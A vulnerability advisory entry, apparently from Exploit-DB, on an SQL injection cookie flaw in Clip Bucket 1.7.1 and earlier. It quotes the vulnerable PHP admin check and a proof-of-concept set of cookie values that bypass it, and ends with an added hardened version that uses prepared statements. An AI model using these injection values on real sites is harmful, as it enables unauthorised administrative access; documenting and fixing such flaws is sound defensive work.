Vendor: Clip Bucket
By: Qabandi
CVSS: 7.5 (HIGH)
Insecure Cookie Handling
CWE: 613
Product Name: Clip Bucket
Affected Version From: 1.7.1
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:clipbucket:clip_bucket
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A

Clip Bucket <= 1.7.1 Insecure Cookie Handling

Clip Bucket versions 1.7.1 and earlier are vulnerable to insecure cookie handling because the application does not properly validate cookie values. An attacker can exploit this vulnerability to gain access to the application and perform malicious activities.

Mitigation:

Upgrade to the latest version of Clip Bucket or apply the patch provided by the vendor.

Exploit-DB raw data:

By Qabandi
From Kuwait, PEACE...
iqa[a]hotmail.fr

=Vuln:		Clip Bucket <= 1.7.1 Insecure Cookie Handling
=INFO:		http://clip-bucket.com/
=BUY:  		---
=Download:      http://clip-bucket.com/download
=DORK:	  :) 

                                  ____________
                              _-=/:Conditions:\=-_
````````````````````````````````````````````````````````````````````````````````

Magic_quotes MUST BE OFF

---------------------------------------===--------------------------------------

                                _________________
                            _-=/:Vulnerable_Code:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "\includes\classes\user.class.php"

function admin_check(){
	$admin = 'Admin';
	// Only the presence of the three cookies is checked, not their values.
	if(isset($_COOKIE['userid']) && isset($_COOKIE['username']) && isset($_COOKIE['session']))
	{
		$userid = @$_SESSION['userid'];
		$username = @$_SESSION['username'];
		$session = @$_COOKIE['PHPSESSID'];

		// The values are concatenated into the SQL string without escaping.
		$query = mysql_query("SELECT * FROM users WHERE level='".$admin."' AND username ='".$username."' AND userid = '".$userid."' AND session='".$session."'");
		if(mysql_num_rows($query)>0){
			$answer = 1;
			return $answer;
		}else{
			$answer = 0;
			return $answer;
		}
	}
}

---------------------------------------===--------------------------------------

                                     _______
                                 _-=/:P.o.C:\=-_
````````````````````````````````````````````````````````````````````````````````
Set Cookies:

userid=q' or 1='1
username=q' or 1='1
session=q' or 1='1


---------------------------------------===--------------------------------------

                                    __________
                                _-=/:SOLUTION:\=-_
````````````````````````````````````````````````````````````````````````````````
nah

---------------------------------------===--------------------------------------
 ______________________________________________________________________________
/                                                                              \
|      ----------------------------------------------------------------------  |
\______________________________________________________________________________/
                                \ No More Private /
                                 `````````````````
                           Salamz to All Muslim Hackers.

# milw0rm.com [2009-07-24]
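
For comparison with the admin_check function quoted above, a hardened form of the same check. This is an added example, not code from the advisory or from the Clip Bucket project and not the vendor's patch; the table and column names follow the quoted query, while the PDO handle, the function signature and the in-memory SQLite fixture are assumptions made for illustration.

```php
<?php
// Added example (not Clip Bucket's code). Column names follow the query
// quoted in the advisory; the PDO handle and fixture are assumptions.

function admin_check(PDO $db, array $session, string $sessionId): bool
{
    // Identity comes only from server-side session state, never from
    // client-supplied userid/username cookies.
    if (!isset($session['userid'], $session['username'])) {
        return false;
    }
    // Reject values of the wrong shape before touching the database.
    if (!ctype_digit((string) $session['userid']) || !is_string($session['username'])) {
        return false;
    }
    // Placeholders keep every value out of the SQL text.
    $stmt = $db->prepare(
        'SELECT 1 FROM users
          WHERE level = :level AND username = :username
            AND userid = :userid AND session = :session'
    );
    $stmt->execute([
        ':level'    => 'Admin',
        ':username' => $session['username'],
        ':userid'   => (int) $session['userid'],
        ':session'  => $sessionId,
    ]);
    // fetchColumn() returns false when no row matched.
    return $stmt->fetchColumn() !== false;
}

// Constructed fixture: one admin row in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (userid INTEGER, username TEXT, level TEXT, session TEXT)');
$db->exec("INSERT INTO users VALUES (1, 'admin', 'Admin', 'abc123')");

$q = "q' or 1='1"; // value shaped like the advisory's P.o.C. cookies

// 1) Genuine admin session.
var_dump(admin_check($db, ['userid' => 1, 'username' => 'admin'], 'abc123'));
// 2) Malformed userid is rejected by the type check.
var_dump(admin_check($db, ['userid' => $q, 'username' => $q], $q));
// 3) Quote characters in bound values are compared as data, so no row matches.
var_dump(admin_check($db, ['userid' => 1, 'username' => $q], $q));
```

In an application the call would be `admin_check($db, $_SESSION, session_id())` after `session_start()`, so that none of the compared values is read from a cookie the client can set freely.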